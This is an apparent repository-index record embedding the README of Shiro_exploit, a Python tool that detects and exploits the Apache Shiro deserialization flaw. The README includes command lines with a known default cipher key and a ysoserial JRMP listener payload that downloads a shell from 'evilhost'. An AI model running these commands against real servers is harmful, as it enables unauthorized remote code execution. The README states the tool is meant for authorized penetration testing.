{"id":20508661,"url":"https://github.com/insightglacier/shiro_exploit","last_synced_at":"2025-04-05T18:07:37.853Z","repository":{"id":49312708,"uuid":"234908012","full_name":"insightglacier/Shiro_exploit","owner":"insightglacier","description":"Apache Shiro deserialization vulnerability detection and exploitation tool","archived":false,"fork":false,"pushed_at":"2020-01-29T12:02:47.000Z","size":49832,"stargazers_count":534,"open_issues_count":3,"forks_count":123,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-03-29T17:07:23.432Z","etag":null,"topics":["crypto","deserialize","exploit","gadget","shiro","vulnerability","vulnerability-research","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"https://bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/insightglacier.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-01-19T13:50:32.000Z","updated_at":"2025-03-27T02:35:07.000Z","dependencies_parsed_at":"2022-09-06T03:10:38.503Z","dependency_job_id":null,"html_url":"https://github.com/insightglacier/Shiro_exploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/insightglacier%2FShiro_exploit/manifests","owner_url":"https://re
pos.ecosyste.ms/api/v1/hosts/GitHub/owners/insightglacier","download_url":"https://codeload.github.com/insightglacier/Shiro_exploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247378141,"owners_count":20929296,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["crypto","deserialize","exploit","gadget","shiro","vulnerability","vulnerability-research","vulnerability-scanners"],"created_at":"2024-11-15T20:19:44.512Z","updated_at":"2025-04-05T18:07:37.828Z","avatar_url":"https://github.com/insightglacier.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Shiro_exploit\n\nShiro_exploit is a script for detecting and exploiting the Apache Shiro deserialization vulnerability. It can help organizations find security vulnerabilities in their own systems.\n\nThe script uses 22 keys collected from the internet together with the URLDNS gadget from the ysoserial tool, combined with a dnslog platform, to detect the vulnerability. For exploitation, the gadget and its parameters can be chosen, which adds flexibility.\n\n# Environment\n\nPython2.7\n\nrequests\n\nJDK 1.8\n\n# Usage\n\n    usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]\n\n    OPTIONS:\n    -h, --help            show this help message and exit\n    -u URL, --url URL     Target url.\n    -t TYPE, --type TYPE  Check or Exploit. 
Check :1 , Exploit:2 , Find gadget:3\n    -g GADGET, --gadget GADGET\n                            gadget\n    -p PARAMS, --params PARAMS\n                            gadget params\n    -k KEY, --key KEY     CipherKey\n\n    Example: python shiro_exploit.py -u target\n\n\nBy default, detection only needs the -u parameter.\n\nTo detect which gadgets are usable, run:\n\npython shiro_exploit.py -u http://target/ -t 3 -p \"ping -c 2 {dnshost}\" -k \"kPH+bIxk5D2deZiIxcaaaA==\"\n\nWhen the program runs, it obtains a dnslog domain name and substitutes it for the `{dnshost}` value, so this does not need to be modified. The problem of a command that works on both Windows and Linux has not been solved yet, so specify -p yourself according to the actual situation.\n\n![Detecting usable gadgets](images/detector.png)\n\nFor exploitation, the JRMP approach can be used, or you can exploit using the gadget found by detection.\n\nServer:\n\njava -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell -o shell'\n\nLocal:\n\npython shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p \"remote_host:1099\" -k \"kPH+bIxk5D2deZiIxcaaaA==\"\n\n\n# FAQ\n1. No module named 'Crypto' appears at runtime\n\nRun the following commands:\n\n```\npip uninstall crypto pycryptodome\npip install pycryptodome\n```\n\nIn \\Lib\\site-packages under the Python installation directory, rename the crypto folder to Crypto.\n\nIf you have other problems or suggestions, feel free to submit an issue.\n\nThe thinking behind the tool is described in my blog post:\n\n[https://www.bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/](https://www.bacde.me/post/Apache-Shiro-Deserialize-Vulnerability/ \"Apache Shiro Deserialization Vulnerability in Practice\")\n\nNote: Do not use this script for illegal purposes; it is only for legal, authorized penetration testing and for internal company security checks and research. The author is not responsible for any adverse consequences arising from use of the tool.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finsightglacier%2Fshiro_exploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Finsightglacier%2Fshiro_exploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finsightglacier%2Fshiro_exploit/lists"}